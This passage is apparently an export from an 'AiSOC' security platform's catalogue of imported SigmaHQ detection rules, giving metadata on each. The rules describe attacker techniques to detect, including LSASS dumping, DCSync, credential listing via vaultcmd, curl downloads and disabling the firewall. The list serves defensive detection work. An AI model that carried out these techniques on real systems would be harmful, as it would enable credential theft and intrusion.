"severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-download-from-file-sharing-domain-via-curl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56454143-524f-49fb-b1c6-3fb8b1ad41fb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-5687f942-867b-4578-ade7-1e341c46e99a", "type": "detection", "name": "VMToolsd Suspicious Child Process", "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vmtoolsd-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5687f942-867b-4578-ade7-1e341c46e99a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" } }, { "id": "sigmahq-sigma-56abae0c-6212-4b97-adc0-0b559bb950c3", "type": "detection", "name": "Important Windows Service Terminated Unexpectedly", 
"description": "Detects important or interesting Windows services that got terminated unexpectedly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/important-windows-service-terminated-unexpectedly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56abae0c-6212-4b97-adc0-0b559bb950c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml" } }, { "id": "sigmahq-sigma-56c217c3-2de2-479b-990f-5c109ba8458f", "type": "detection", "name": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-default-powersploit-empire-scheduled-task-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56c217c3-2de2-479b-990f-5c109ba8458f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" } }, { "id": "sigmahq-sigma-56d19cb4-6414-4769-9644-1ed35ffbb148", "type": "detection", "name": "Obfuscated IP Via CLI", "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/obfuscated-ip-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56d19cb4-6414-4769-9644-1ed35ffbb148", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml" } }, { "id": "sigmahq-sigma-56e05d41-ce99-4ecd-912d-93f019ee0b71", "type": "detection", "name": "Visual Studio Code Tunnel Remote File Creation", "description": "Detects the creation of file by the \"node.exe\" process in the \".vscode-server\" directory. 
Could be a sign of remote file creation via VsCode tunnel feature", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-studio-code-tunnel-remote-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56e05d41-ce99-4ecd-912d-93f019ee0b71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml" } }, { "id": "sigmahq-sigma-56fa3cd6-f8d6-4520-a8c7-607292971886", "type": "detection", "name": "Cisco BGP Authentication Failures", "description": "Detects BGP failures which may be indicative of brute force attacks to manipulate routing", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1110", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-bgp-authentication-failures.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56fa3cd6-f8d6-4520-a8c7-607292971886", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml" } }, { "id": 
"sigmahq-sigma-56fda488-113e-4ce9-8076-afc2457922c3", "type": "detection", "name": "Possible DCSync Attack", "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-dcsync-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56fda488-113e-4ce9-8076-afc2457922c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" } }, { "id": "sigmahq-sigma-570ae5ec-33dc-427c-b815-db86228ad43e", "type": "detection", "name": "Application Uninstalled", "description": "An application has been removed. 
Check if it is critical.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/application-uninstalled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "570ae5ec-33dc-427c-b815-db86228ad43e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/msiinstaller/win_builtin_remove_application.yml" } }, { "id": "sigmahq-sigma-571498c8-908e-40b4-910b-d2369159a3da", "type": "detection", "name": "Password Protected ZIP File Opened (Email Attachment)", "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-protected-zip-file-opened-email-attachment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "571498c8-908e-40b4-910b-d2369159a3da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" } }, { "id": "sigmahq-sigma-5722dff1-4bdd-4949-86ab-fbaf707e767a", "type": "detection", "name": "PUA - System Informer Execution", "description": "Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1564", "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-system-informer-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5722dff1-4bdd-4949-86ab-fbaf707e767a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_pua_system_informer.yml" } }, { "id": "sigmahq-sigma-572b12d4-9062-11ed-a1eb-0242ac120002", "type": "detection", "name": "Suspicious SignIns From A Non Registered Device", "description": "Detects risky authentication from a non AD registered device without MFA being required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-signins-from-a-non-registered-device.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "572b12d4-9062-11ed-a1eb-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml" } }, { "id": "sigmahq-sigma-573df571-a223-43bc-846e-3f98da481eca", "type": "detection", "name": "Creation Of a Suspicious ADS File Outside a Browser Download", "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-a-suspicious-ads-file-outside-a-browser-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"573df571-a223-43bc-846e-3f98da481eca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml" } }, { "id": "sigmahq-sigma-575dce0c-8139-4e30-9295-1ee75969f7fe", "type": "detection", "name": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1615", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-reconnaissance-activity-via-gathernetworkinfo-vbs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "575dce0c-8139-4e30-9295-1ee75969f7fe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_gather_network_info.yml" } }, { "id": "sigmahq-sigma-576426ad-0131-4001-ae01-be175da0c108", "type": "detection", "name": "PowerShell Script Dropped Via PowerShell.EXE", "description": "Detects PowerShell creating a PowerShell file (.ps1). 
While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-dropped-via-powershell-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "576426ad-0131-4001-ae01-be175da0c108", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_drop_powershell.yml" } }, { "id": "sigmahq-sigma-57b649ef-ff42-4fb0-8bf6-62da243a1708", "type": "detection", "name": "Windows Defender Threat Detected", "description": "Detects actions taken by Windows Defender malware detection engines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-threat-detected.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_threat.yml" } }, { "id": "sigmahq-sigma-57bff678-25d1-4d6c-8211-8ca106d12053", "type": "detection", "name": "Remote Access Tool - ScreenConnect Execution", "description": "An adversary may use 
legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "57bff678-25d1-4d6c-8211-8ca106d12053", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml" } }, { "id": "sigmahq-sigma-57c4bf16-227f-4394-8ec7-1b745ee061c3", "type": "detection", "name": "Firewall Disabled via Netsh.EXE", "description": "Detects netsh commands that turn off the Windows firewall", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/firewall-disabled-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_disable.yml" } }, { "id": "sigmahq-sigma-5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "type": "detection", "name": "PUA - Radmin Viewer Utility Execution", "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-radmin-viewer-utility-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_radmin.yml" } }, { "id": "sigmahq-sigma-583aa0a2-30b1-4d62-8bf3-ab73689efe6c", "type": "detection", "name": "Java Payload Strings", "description": "Detects possible Java payloads in web access logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/java-payload-strings.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_java_payload_in_access_logs.yml" } }, { "id": "sigmahq-sigma-584bca0f-3608-4402-80fd-4075ff6072e3", "type": "detection", "name": "Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image", "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-commandline-obfuscation-using-unicode-characters-from-suspicious-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "584bca0f-3608-4402-80fd-4075ff6072e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml" } }, { "id": "sigmahq-sigma-586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", "type": "detection", "name": "Remote Service Activity via SVCCTL Named Pipe", "description": "Detects remote service activity via remote access to the svcctl named pipe", "version": 
"1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-service-activity-via-svcctl-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_svcctl_remote_service.yml" } }, { "id": "sigmahq-sigma-587254ee-a24b-4335-b3cd-065c0f1f4baa", "type": "detection", "name": "Remote File Download Via Findstr.EXE", "description": "Detects execution of \"findstr\" with specific flags and a remote share path. 
This specific set of CLI flags would allow \"findstr\" to download the content of the file located on the remote share as described in the LOLBAS entry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1564.004", "T1552.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-file-download-via-findstr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "587254ee-a24b-4335-b3cd-065c0f1f4baa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_download.yml" } }, { "id": "sigmahq-sigma-58800443-f9fc-4d55-ae0c-98a3966dfb97", "type": "detection", "name": "System Network Discovery - macOS", "description": "Detects enumeration of local network configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-network-discovery-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58800443-f9fc-4d55-ae0c-98a3966dfb97", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/macos/process_creation/proc_creation_macos_susp_system_network_discovery.yml" } }, { "id": "sigmahq-sigma-589ac73f-8e12-409c-964e-31a2f5775ae2", "type": "detection", "name": "HackTool - WSASS Execution", "description": "Detects execution of WSASS, a tool used to dump LSASS memory on Windows systems by leveraging WER's\n(Windows Error Reporting) WerFaultSecure.EXE to bypass PPL (Protected Process Light) protections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-wsass-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "589ac73f-8e12-409c-964e-31a2f5775ae2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_wsass.yml" } }, { "id": "sigmahq-sigma-58af08eb-f9e1-43c8-9805-3ad9b0482bd8", "type": "detection", "name": "Invalid PIM License", "description": "Identifies when an organization doesn't have the proper license for PIM and is out of compliance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invalid-pim-license.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58af08eb-f9e1-43c8-9805-3ad9b0482bd8", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_invalid_license.yml" } }, { "id": "sigmahq-sigma-58c0bff0-40a0-46e8-b5e8-b734b84d2017", "type": "detection", "name": "Certificate Exported From Local Certificate Store", "description": "Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-exported-from-local-certificate-store.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58c0bff0-40a0-46e8-b5e8-b734b84d2017", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml" } }, { "id": "sigmahq-sigma-58cb02d5-78ce-4692-b3e1-dce850aae41a", "type": "detection", "name": "Alternate PowerShell Hosts Pipe", "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/alternate-powershell-hosts-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_powershell_alternate_host_pipe.yml" } }, { "id": "sigmahq-sigma-58d31a75-a4f8-4c40-985b-373d58162ca2", "type": "detection", "name": "Kubernetes Secrets Modified or Deleted", "description": "Detects when Kubernetes Secrets are Modified or Deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-secrets-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58d31a75-a4f8-4c40-985b-373d58162ca2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_secrets_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "type": "detection", "name": "Suspicious Serv-U Process Pattern", "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": 
false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-serv-u-process-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml" } }, { "id": "sigmahq-sigma-58f50261-c53b-4c88-bd12-1d71f12eda4c", "type": "detection", "name": "Windows Credential Manager Access via VaultCmd", "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-credential-manager-access-via-vaultcmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vaultcmd_list_creds.yml" } }, { "id": "sigmahq-sigma-58f88172-a73d-442b-94c9-95eaed3cbb36", "type": "detection", "name": "New Federated Domain Added", "description": "Detects the addition of a new Federated Domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": 
